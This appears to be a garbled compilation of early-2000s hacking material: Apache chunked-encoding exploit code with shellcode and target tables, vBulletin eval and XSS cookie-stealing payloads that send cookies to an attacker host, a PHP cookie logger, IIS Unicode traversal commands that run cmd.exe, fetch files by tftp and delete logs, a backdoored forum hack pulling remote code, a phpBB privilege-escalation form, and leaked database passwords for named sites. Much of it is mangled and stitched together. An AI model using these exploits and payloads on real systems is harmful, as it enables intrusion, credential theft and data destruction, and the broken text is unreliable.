#define EXPLOIT_TIMEOUT 5	/* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =
	"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
	"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
	"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
	"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
	"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
	"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
	"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
	"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
	"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

struct {
	char *type;
	u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
	{ "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae },
};

int main(int argc, char *argv[]) {
	char *hostp, *portp;
	unsigned char buf[512], *expbuf, *p;
	int i, j, lport;
	int sock;
	int bruteforce, owned, progress;
	u_long retaddr;
	struct sockaddr_in sin, from;

	if(argc != 3) {
		printf("Usage: %s \n", argv[0]);
		printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
		printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
		printf("\n--- --- - Potential targets list - --- ----\n");
		printf("Target ID / Target specification\n");
		for(i = 0; i < sizeof(targets)/8; i++)
			printf("\t%d / %s\n", i, targets[i].type);
		return -1;
	}
		if(progress == 1) {
			memset(buf, 0, sizeof(buf));
			sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
				retaddr, (unsigned int)(p - expbuf), lport);
			memset(buf + strlen(buf), ' ', 74 - strlen(buf));
			puts(buf);
			if(bruteforce)
				putchar(';');
		}
		else
			putchar((rand()%2)? 'P': 'p');
		fflush(stdout);

		while (1) {
			fd_set fds;
			int n;
			struct timeval tv;

			tv.tv_sec = EXPLOIT_TIMEOUT;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);

			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
						break;
					if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
						printf("\nGOBBLE GOBBLE!@#%%)*#\n");
						printf("retaddr 0x%lx did the trick!\n", retaddr);
						sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
						write(sock, expbuf, strlen(expbuf));
						++owned;
					}
					write(1, buf, n);
				}
				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);
					write(sock, buf, n);
				}
			}
			if(!owned)
				break;
		}
		free(expbuf);
		close(sock);
		if(owned)
			return 0;
		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}
	return 0;
}
Exploit #2:
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
#define HOST_PARAM "apache-nosejob.c"	/* The Host: field */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC 512
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\
"\\\xcd\\\\x80\\
\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\
\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\
"\\\xe3\\\\x50\\
\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
/* char *type; /* description for newbie penetrator
/* !int delta; /* delta thingie
/* u_long retaddr; /* return address
/* int repretaddr; /* we repeat retaddr thiz many times in the buffer
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
;victim ,{
void usage(void) {
    int i;
    printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
    printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
    printf(" -h host[:port]\tHost to penetrate\n");
    printf(" -t #\t\t\tTarget id.\n");
    printf(" Bruteforcing options (all required, unless -o is used!):\n");
    printf(" -o char\t\tDefault values for the following OSes\n");
    printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
    printf(" -b 0x12345678\t\tBase address used for bruteforce\n");
    printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
    printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
    printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
    printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
    printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
    printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
    printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
    printf(" Optional stuff:\n");
    printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
    printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n");
    printf(" \t\t\taka auto0wncmdz\n");
    printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
    printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
    printf(" ID / Return addr / Target specification\n");
    for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
        printf("% 3d / 0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);
    exit(1);
}
int main(int argc, char *argv[]) {
    char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
    u_char buf[512], *expbuf, *p;
    int i, j, lport, sock;
    int bruteforce, owned, progress, sc_timeout = 5;
    int responses, shown_length = 0;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;
    if(argc < 4)
        usage();
    bruteforce = 0;
    memset(&victim, 0, sizeof(victim));
    while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
        switch(i) {
            /* required stuff */
            case 'h':
                hostp = strtok(optarg, ":");
                if((portp = strtok(NULL, ":")) == NULL)
                    portp = "80";
                break;
            /* predefined targets */
            case 't':
                if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
                    printf("Invalid target\n");
                    return -1;
                }
                memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
                break;
            /* bruteforce! */
            case 'b':
                ++bruteforce;
                victim.type = "Custom target";
                victim.retaddr = strtoul(optarg, NULL, 16);
                printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr);
                break;
            case 'd':
                victim.delta = atoi(optarg);
                printf("Using %d as delta\n", victim.delta);
                break;
            case 'r':
                victim.repretaddr = atoi(optarg);
                printf("Repeating the return address %d times\n", victim.repretaddr);
                break;
            case 'z':
                victim.repzero = atoi(optarg);
                printf("Number of zeroes will be %d\n", victim.repzero);
                break;
            case 'o':
                ++bruteforce;
                switch(*optarg) {
                    case 'f':
                        victim.type = "FreeBSD";
                        victim.retaddr = 0x80a0000;
                        victim.delta = -150;
                        victim.repretaddr = 6;
                        victim.repzero = 36;
                        break;
                    case 'o':
                        victim.type = "OpenBSD";
                        victim.retaddr = 0x80000;
                        victim.delta = -146;
                        victim.repretaddr = 6;
                        victim.repzero = 36;
                        break;
                    case 'n':
                        victim.type = "NetBSD";
                        victim.retaddr = 0x080e0000;
                        victim.delta = -90;
                        victim.repretaddr = 5;
                        victim.repzero = 42;
                        break;
                    default:
                        printf("[-] Better luck next time!\n");
                        break;
                }
                break;
            /* optional stuff */
            case 'w':
                sc_timeout = atoi(optarg);
                printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
                break;
            case 'c':
                cmdz = optarg;
                break;
            default:
                usage();
                break;
        }
    }
    if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
        printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
        return -1;
    }
    printf("[*] Resolving target host.. ");
    fflush(stdout);
    he = gethostbyname(hostp);
    if(he)
        memcpy(&ia.s_addr, he->h_addr, 4);
    else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
        printf("There'z no %s on this side of the Net!\n", hostp);
        return -1;
    }
    printf("%s\n", inet_ntoa(ia));
    srand(getpid());
    signal(SIGPIPE, SIG_IGN);
    for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
        /* skip invalid return adresses */
        if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
            continue;
        sock = socket(PF_INET, SOCK_STREAM, 0);
        sin.sin_family = PF_INET;
        sin.sin_addr.s_addr = ia.s_addr;
        sin.sin_port = htons(atoi(portp));
        if(!progress)
            printf("[*] Connecting.. ");
        fflush(stdout);
        if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
            perror("connect()");
            exit(1);
        }
        if(!progress)
            printf("connected!\n");
        p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
                            + (REP_POPULATOR * (1024 + PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero)));
        PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
        for (i = 0; i < REP_SHELLCODE; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_3, PADDING_3);
            PUT_STRING(": ");
            PUT_BYTES(NOPCOUNT, NOP);
            memcpy(p, shellcode, sizeof(shellcode) - 1);
            p += sizeof(shellcode) - 1;
            PUT_STRING("\r\n");
        }
        for (i = 0; i < REP_POPULATOR; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_1, PADDING_1);
            PUT_STRING(": ");
            for (j = 0; j < victim.repretaddr; j++) {
                *p++ = victim.retaddr & 0xff;
                *p++ = (victim.retaddr >> 8) & 0xff;
                *p++ = (victim.retaddr >> 16) & 0xff;
                *p++ = (victim.retaddr >> 24) & 0xff;
            }
            PUT_BYTES(victim.repzero, 0);
            PUT_STRING("\r\n");
        }
        PUT_STRING("Transfer-Encoding: chunked\r\n");
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
        PUT_STRING(buf);
        PUT_BYTES(PADSIZE_2, PADDING_2);
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
        PUT_STRING(buf);
        if(!shown_length) {
            printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
            shown_length = 1;
        }
        write(sock, expbuf, p - expbuf);
        ++progress;
        if((progress%70) == 0)
            progress = 1;
        if(progress == 1) {
            printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
            for(i = 0; i < 40; i ++)
                printf(" ");
            printf("\n");
        }
        if(bruteforce) {
            putchar(';');
        } else
            putchar(((rand()>>8)%2)? 'P': 'p');
        fflush(stdout);
        responses = 0;
        while (1) {
            fd_set fds;
            int n;
            struct timeval tv;
            tv.tv_sec = sc_timeout;
            tv.tv_usec = 0;
            FD_ZERO(&fds);
            FD_SET(0, &fds);
            FD_SET(sock, &fds);
            memset(buf, 0, sizeof(buf));
            if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
                if(FD_ISSET(sock, &fds)) {
                    if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
                        break;
                    if(n >= 1) {
                        if(!owned) {
                            for(i = 0; i < n; i ++)
                                if(buf[i] == 'G')
                                    responses ++;
                                else
                                    responses = 0;
                            if(responses >= 2) {
                                owned = 1;
                                write(sock, "O", 1);
                                write(sock, cmdz, strlen(cmdz));
                                printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n",
                                       victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
                                printf("Experts say this isn't exploitable, so nothing will happen now: ");
                                fflush(stdout);
                            }
                        } else {
                            write(1, buf, n);
                        }
                    }
                }
                if(FD_ISSET(0, &fds)) {
                    if((n = read(0, buf, sizeof(buf) - 1)) < 0)
                        exit(1);
                    write(sock, buf, n);
                }
            }
            if(!owned)
                break;
        }
        free(expbuf);
        close(sock);
        if(owned)
            return 0;
        if(!bruteforce) {
            fprintf(stderr, "Ooops.. hehehe!\n");
            return -1;
        }
    }
    return 0;
}
(( angels-bytes.com ))
http://www.angels-bytes.com/?show=tools&action=info&id=19
<?php
$LOGIN = "User";
$PASSWORD = "Password";
function error ($error_message) {
    echo $error_message . "\n";
    exit;
}
if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN) && ($PHP_AUTH_PW == $PASSWORD)) ) {
    header("WWW-Authenticate: Basic realm=\"Form2txt admin\"");
    header("HTTP/1.0 401 Unauthorized");
    /* the message text inside the <font> tag was lost in this copy */
    error("<p align=right><font face=Tahoma size=2 color=Red></font></p>");
}
?>
Apache logs (Access Log):
GET / bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
Forgot Password
HTML <img> <script>
Be Secret .. Don't be Lamer
2002 - 1 - 31
2.2.0
Powered by: vBulletin
http://www.vbulletin.org/index.php?topic=<script>alert(document.cookie)</script>
http://www.vbulletin.org/index.php?|=forum/view.php&topic=../../../../../../../etc/passwd
********************
Jouko Pynnonen
vBulletin (http://www.vbulletin.com/) is a commonly used web forum
system written in PHP. One of its key features is use of templates,
which allow the board administrator to dynamically modify the look of
the board.

vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval() parameters
and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.

According to the authors the vulnerability exists in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependent issues, so it's presumably
exploitable under any OS or platform.

DETAILS
=======

vBulletin templates are implemented in the following way: the
gettemplate() function in global.php is used to fetch a template from
database. The code is then passed to eval(). If we take index.php for
an example, there's this code:
if ($action=="faq") {
    eval("echo dovars(\"".gettemplate("faq")."\");");
}
The dovars() function does some variable replacing, such as replacing
<largefont> with <font size="10">.

The gettemplate() function is defined in global.php:
function gettemplate($templatename,$escape=1) {
    // gets a template from the db or from the local cache
    global $templatecache,$DB_site;
    if ($templatecache[$templatename]!="") {
        $template=$templatecache[$templatename];
    } else {
        $gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='".addslashes($templatename)."'");
        $template=$gettemp[template];
        $templatecache[$templatename]=$template;
    }
    if ($escape==1) {
        $template=str_replace("\"","\\\"",$template);
    }
    return $template;
}
By Kill -9
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
IP Address
(IIS / Apache)
Apache logs (Access Log):
GET / bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
http://target/page.asp+.htr
target :
page.asp :
+.htr :
View Source of the ASP:
<%
Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
-----------------------------------------------------------------
_LinuxRay
6666666
------------------------------------------------------------------
ASP error:
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
*.inc
ASP
database.inc
<!--#include file = "database.inc"-->
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
global.asa+.htr
IIS 3 ASP ::$DATA
file.asp::$DATA
IIS 3
SQL
Visual InterDev 6.0
ACCESS 2000
File
New
Project (Existing Data)
Create
Data Link Properties
- 1 Select or enter server name
- 2 User Name
- 3 Password (Blank Password)
Test Connection
Test Connection Succeeded
Select the database on the server
OK
http://www.moe.gov.sa/
1 -
http://www.moe.gov.sa/news_admin.asp
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/news_admin.asp, line 7
htr :
http://www.moe.gov.sa/news_admin.asp+.htr
<!--#include file = "database.inc"-->
database.inc :
http://www.moe.gov.sa/database.inc
<%
Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"
%>
http://www.itsalat.com/
1 - User name : sa   Passwd : sp2000
*****************
IIS 4 / 5 ... IIS5.0 :
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\
c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
http://www.xxxxx.com///////....2/cmd.exe/?/c+\
Dir
32
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\Winnt\System32
\Winnt\System32
http://www.xxxxx.com/scripts/......exe?/c+dir+c:\
32
c+dir+c:\
http://www.xxxxx.com/scripts/.....Winnt/System32/
tftp.exe
www.geocities.com/anorR1234/tftpd32.zip
C:\
tftp32.exe
C:\
----------------------------------------------------------------
http://www.xxxxx.com/scripts/......exe?/c+dir+c:\
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
/c+dir+c:\
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
tftp.exe
"-i"
1.1.1.1
GET
index.htm
C:\inetpub\wwwroot\
index.htm
C:\
index.htm
http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://server/msadc/..../..../c+del+c:/*.log
--------------------------------------
*******************
2.2.5
forum
PHP:
-------------------------------------------------------------------------------
if ($action=="modify") {
    $vbxh = h;
    $vbxt = t;
    $vbxp = p;
    $vbxw = w;
    $vbxa = a;
    $vbx1 = 1;
    $vbxr = r;
    $vbxb = b;
    $vbxn = n;
    $vbxe = e;
    $vbxo = o;
    $vbxy = y;
    $vbxl = l;
    echo "<!-- ";
    $file = fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME", "r");
    $rf = fread($file, 1000);
    fclose($file);
    echo " -->";
}
-------------------------------------------------------------------------------
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
2.2.6
option
PHP:
-------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
echo " -->";
-------------------------------------------------------------------------------
functions
PHP:
-------------------------------------------------------------------------------
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
-------------------------------------------------------------------------------
http://saudi.no-ip.com/
WELCOME TO arab1.net
http://saudi.no-ip.com/~royal/.x2.inc
.......
PHP:
-------------------------------------------------------------------------------
<div id="sHo" style="display:none">
<!--
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
    Case "Log":
        $Data = $HTTP_GET_VARS['Cookie'];
        $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
        $Log = FOpen ($LogFile, "a+");
        FWrite ($Log, Trim ($Data) . "\n");
        FClose ($Log);
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
    Case "List":
        If (!File_Exists ($LogFile) || !In_Array ($Records)) {
            Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
            Exit ();
        }
        Else {
            Print ("</Center></Pre>");
            $Records = Array_UniQue (File ($LogFile));
            Print ("<Pre>");
            Print ("<B>.:: Statics</B>\n");
            Print ("\n");
            Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
            Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
            Print ("\n");
            Print ("<B>.:: Options</B>\n");
            Print ("\n");
            If (Count (File ($LogFile)) > 0) {
                $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
            }
            Else {
                $Link['Download'] = "[No Records in Log]";
            }
            Print ("o Download Log : " . $Link['Download'] . "\n");
            Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
            Print ("\n");
            Print ("<B>.:: Records</B>\n");
            Print ("\n");
            While (List ($Line[0], $Line[1]) = Each ($Records)) {
                Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
            }
        }
        Print ("</Pre>");
        Break;
    Case "Delete":
        @UnLink ($LogFile);
        Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
}
?>
2 - php
3 -
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
[script code]
<Script>location='Http://[]?Action=Log&Cookie='+(document.cookie);</Script>
4 -
http://%20/?Action=List
PhpBB2
admin_ug_auth.php
:
:
2.0.0
<html>
<head>
</head>
<body>
<form method="post" action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
http://www.domain_name/board_directory
html
Administrator
submit
http://forums.xos.ca/
images/forum/avatars/
text
Your Account
Your Info  view source
uid
<input type="hidden" name="uid" value="2111">
2111
html
http://nukesite/
<!-- START CODE -->
<form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form>
html
"><b
submit
Your Account
"><h1>TESTING</h1><b
TESTING
b">
30
xss
Packet Storm Security
---------------------
http://packetstorm.securify.com/ :
'New Files Today'
Ken Williams
(Kroll-O-Nagra / http://www.securify.com/)
Security Focus
---------------
http://www.securityfocus.com/ :
BugTraq
-------
(Security Focus / http://www.securityfocus.com, Netspace / http://www.netspace.org/)
BugTraq mailing list
Aleph1 (aleph1@underground.org)
spams
http://www.securityfocus.com/
'search'
Searching
-----------
'Sendmail 8.8.3'
'sendmail 8.8.3 local DoS'
sendmail
'local DoS sendmail'
:::
1. http://rootshell.redi.tk/
2. http://www.ussrback.com
3. http://www.insecure.org/sploits.html
4. http://www.linux.com.cn/hack.co.za
==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:::
1. http://www.haker.com.pl
2. http://www.webattack.com/
3. http://blacksun.box.sk
4. http://www.blackcode.com
http://www.t0010.com/books/index.php